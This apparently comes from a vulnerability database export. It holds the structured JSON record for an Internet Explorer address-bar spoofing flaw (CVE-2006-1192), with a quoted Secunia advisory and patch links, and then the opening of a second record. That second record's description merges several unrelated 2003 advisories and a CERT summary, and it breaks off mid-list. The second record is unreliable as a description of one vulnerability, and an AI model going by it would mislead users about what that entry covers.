"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200604-0205",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 for itanium-based systems"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 x64 edition"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp professional x64 edition"
},
{
"model": "internet explorer sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer for windows nt",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.14.0"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.198"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.195"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.12000"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2 do not use",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0-"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.01:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1192"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
],
"trust": 0.6
},
"cve": "CVE-2006-1192",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "High",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.6,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2006-1192",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 4.9,
"id": "VHN-17300",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1192",
"trust": 1.8,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-200604-160",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-17300",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow \"window content to persist\" after the user has navigated to another site, aka the \"Address Bar Spoofing Vulnerability.\" NOTE: this is a different vulnerability than CVE-2006-1626. Microsoft Internet Explorer is prone to address-bar spoofing. Attackers may exploit this via a malicious web page to spoof the contents of a page that the victim may trust. This vulnerability may be useful in phishing or other attacks that rely on content spoofing. \n\nTITLE:\nInternet Explorer Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA18957\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/18957/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nSpoofing, System access, Cross Site Scripting\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in Internet Explorer,\nwhich can be exploited by malicious people to conduct cross-site\nscripting attacks, conduct phishing attacks, or compromise a user\u0027s\nsystem. \n\n1) An error in the cross-domain restriction when accessing properties\nof certain dynamically created objects can be exploited to execute\narbitrary HTML and script code in a user\u0027s browser session in context\nof an arbitrary site via a JavaScript URI handler applied on a\ndynamically created \"object\" tag. \n\n2) An error within the handling of multiple event handlers (e.g. \nonLoad) in an HTML element can be exploited to corrupt memory in a\nway that may allow execution of arbitrary code. \n\n3) An error within the parsing of specially crafted, non-valid HTML\ncan be exploited to corrupt memory in a way that allows execution of\narbitrary code when a malicious HTML document is viewed. \n\n4) An error within the instantiation of COM objects that are not\nintended to be instantiated in Internet Explorer can be exploited to\ncorrupt memory in a way that allows execution of arbitrary code. \n\n5) An error within the handling of HTML elements containing a\nspecially crafted tag can be exploited to corrupt memory in a way\nthat allows execution of arbitrary code. \n\n6) An error within the handling of double-byte characters in\nspecially crafted URLs can be exploited to corrupt memory in a way\nthat allows execution of arbitrary code. \n\nSuccessful exploitation requires that the system uses double-byte\ncharacter sets. \n\n7) An error in the way IOleClientSite information is returned when an\nembedded object is dynamically created can be exploited to execute\narbitrary code in context of another site or security zone. \n\n8) An unspecified error can be exploited to spoof information\ndisplayed in the address bar and other parts of the trust UI. \n\n9) Some unspecified vulnerabilities exist in the two ActiveX controls\nincluded with Danim.dll and Dxtmsft.dll. \n\nSOLUTION:\nApply patches. \n\nInternet Explorer 5.01 SP4 on Windows 2000 SP4:\nhttp://www.microsoft.com/downloa...7B87-AF8F-4346-9164-596E3E5C22B1\n\nInternet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1:\nhttp://www.microsoft.com/downloa...41E1-2B36-4696-987A-099FC57E0129\n\nInternet Explorer 6 for Windows XP SP2:\nhttp://www.microsoft.com/downloa...FB31-E6B4-4771-81F1-4ACCEBF72133\n\nInternet Explorer 6 for Windows Server 2003 and Windows Server 2003\nSP1:\nhttp://www.microsoft.com/downloa...6871-D217-41D3-BECC-B27FAFA00054\n\nInternet Explorer 6 for Windows Server 2003 for Itanium-based systems\nand Windows Server 2003 with SP1 for Itanium-based systems:\nhttp://www.microsoft.com/downloa...957C-0ABE-4129-ABAF-AA2852AD62A3\n\nInternet Explorer 6 for Windows Server 2003 x64 Edition:\nhttp://www.microsoft.com/downloa...8BE3-39EE-4937-9BD1-280FC35125C6\n\nInternet Explorer 6 for Windows XP Professional x64 Edition:\nhttp://www.microsoft.com/downloa...FE3E-620A-4BBC-868B-CA2D9EFF7AC3\n\nInternet Explorer 6 SP1 on Windows 98, Windows 98 SE, or Windows ME:\nPatches are available via the Microsoft Update Web site or the\nWindows Update Web site. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) Discovered by anonymous person. \n2) Michal Zalewski\n3) The vendor credits Jan P. Monsch, Compass Security Network\nComputing. \n4) The vendor credits Richard M. Smith, Boston Software Forensics. \n5) The vendor credits Thomas Waldegger. \n6) The vendor credits Sowhat, Nevis Labs. \n7) The vendor credits Heiko Schultze, SAP. \n9) The vendor credits Will Dormann, CERT/CC. \n\nORIGINAL ADVISORY:\nMS06-013 (KB912812):\nhttp://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "PACKETSTORM",
"id": "45341"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-17300",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "17460",
"trust": 2.8
},
{
"db": "NVD",
"id": "CVE-2006-1192",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "18957",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1015899",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-1318",
"trust": 1.7
},
{
"db": "SREASON",
"id": "670",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "1838",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-17300",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45341",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "PACKETSTORM",
"id": "45341"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"id": "VAR-200604-0205",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T11:04:15.109000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-013.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/17460"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1336"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1498"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1645"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1725"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1740"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015899"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18957"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/670"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/1318"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25557"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/18957/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1192"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2006/1318"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1192"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/217"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/220"
},
{
"trust": 0.4,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"trust": 0.3,
"url": "http://www.mozilla.com/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...fe3e-620a-4bbc-868b-ca2d9eff7ac3"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...8be3-39ee-4937-9bd1-280fc35125c6"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...fb31-e6b4-4771-81f1-4accebf72133"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...957c-0abe-4129-abaf-aa2852ad62a3"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...7b87-af8f-4346-9164-596e3e5c22b1"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...41e1-2b36-4696-987a-099fc57e0129"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...6871-d217-41d3-becc-b27fafa00054"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "PACKETSTORM",
"id": "45341"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "PACKETSTORM",
"id": "45341"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-17300"
},
{
"date": "2006-04-11T00:00:00",
"db": "BID",
"id": "17460"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"date": "2006-04-12T04:04:04",
"db": "PACKETSTORM",
"id": "45341"
},
{
"date": "2006-04-11T23:02:00",
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"date": "2006-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "VULHUB",
"id": "VHN-17300"
},
{
"date": "2006-04-17T17:12:00",
"db": "BID",
"id": "17460"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"date": "2021-07-23T12:17:15.613000",
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer Vulnerable to address bar spoofing",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
],
"trust": 0.6
}
}
VAR-200306-0042
Vulnerability from variot - Updated: 2022-05-08 07:26Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. A Microsoft Windows DirectX library, quartz.dll, does not properly validate certain parameters in Musical Instrument Digital Interface (MIDI) files. A remotely exploitable vulnerability has been discovered in Internet Explorer. A remote attacker could execute arbitrary code with the privileges of the user running IE. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. Description
Microsoft Windows operating systems include multimedia technologies called DirectX and DirectShow. From Microsoft Security Bulletin MS03-030, "DirectX consists of a set of low-level Application Programming Interfaces (APIs) that are used by Windows programs for multimedia support.
Any application that uses DirectX/DirectShow to process MIDI files may be affected by this vulnerability. Of particular concern, Internet Explorer (IE) uses the Windows Media Player ActiveX control and quartz.dll to handle MIDI files embedded in HTML documents. An attacker could therefore exploit this vulnerability by convincing a victim to view an HTML document, such as a web page or an HTML email message, that contains an embedded MIDI file. Note that in addition to IE, a number of applications, including Outlook, Outlook Express, Eudora, AOL, Lotus Notes, and Adobe PhotoDeluxe, use the WebBrowser ActiveX control to interpret HTML documents.
Further technical details are available in eEye Digital Security advisory AD20030723. Common Vulnerabilities and Exposures (CVE) refers to these vulnerabilities as CAN-2003-0346.
Disable embedded MIDI files
Change the Run ActiveX controls and plug-ins security setting to Disable in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses the WebBrowser ActiveX control to render HTML. This modification will prevent MIDI files from being automatically loaded from HTML documents. This workaround is not a complete solution and will not prevent attacks that attempt to load MIDI files directly.
Instructions for modifying IE security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ. References
* CERT/CC Vulnerability Note VU#561284 -
http://www.kb.cert.org/vuls/id/561284
* CERT/CC Vulnerability Note VU#265232 -
http://www.kb.cert.org/vuls/id/265232
* eEye Digital Security advisory AD20030723 -
http://www.eeye.com/html/Research/Advisories/AD20030723.html
* Microsoft Security Bulletin MS03-030 -
http://microsoft.com/technet/security/bulletin/MS03-030.asp
* Microsoft Knowledge Base article 819696 -
http://support.microsoft.com/default.aspx?scid=kb;en-us;819696
_________________________________________________________________
These vulnerabilities were researched and reported by eEye Digital Security. ___________
Feedback can be directed to the author, Art Manion. -----BEGIN PGP SIGNED MESSAGE-----
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the
'Mimail' worm. The most recent variant of the worm (W32/Mimail.J)
arrives as an email message alleging to be from the Paypal
financial service. The message requests that the recipient
'verify' their account information to prevent the suspension of
their Paypal account. Attached to the email is an executable file
which captures this information (if entered), and sends it to a
number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)
and Transport Layer Security (TLS) protocols allowing an attacker
to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
